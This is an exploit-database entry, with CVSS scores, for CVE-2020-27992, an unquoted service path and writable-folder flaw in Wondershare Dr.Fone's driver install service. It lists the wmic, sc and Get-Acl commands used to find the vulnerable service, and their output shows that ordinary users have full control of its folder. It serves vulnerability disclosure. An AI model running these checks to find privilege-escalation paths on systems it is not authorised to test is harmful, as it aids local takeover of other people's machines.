CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
5.1%
# Exploit Title: Wondershare Dr.Fone DriverInstall.exe - "WsDrvInst" Unquoted Service Path
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.wondershare.com
# Software Link: https://drfone.wondershare.com/
# Version: 3.0.0
# Tested on: Microsoft Windows 7sp2 x86/x64
# CVE : CVE-2020-27992
- C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Wondershare Driver Install Service WsDrvInst C:\Program Files (x86)\Wondershare\dr.fone\Library\DriverInstaller\DriverInstall.exe Auto
- C:\>sc query WsDrvInst
NOME_SERVIZIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
STATO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CODICE_USCITA_WIN32 : 0 (0x0)
CODICE_USCITA_SERVIZIO : 0 (0x0)
PUNTO_CONTROLLO : 0x0
INDICAZIONE_ATTESA : 0x0
- Get-Acl -Path "C:\Program Files (x86)\Wondershare\dr.fone\Library\DriverInstaller"
Directory: C:\Program Files (x86)\Wondershare\dr.fone\Library
Path Owner Access
---- ----- ------
DriverInstaller BUILTIN\Administrators BUILTIN\Users Allow FullControl...
CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
5.1%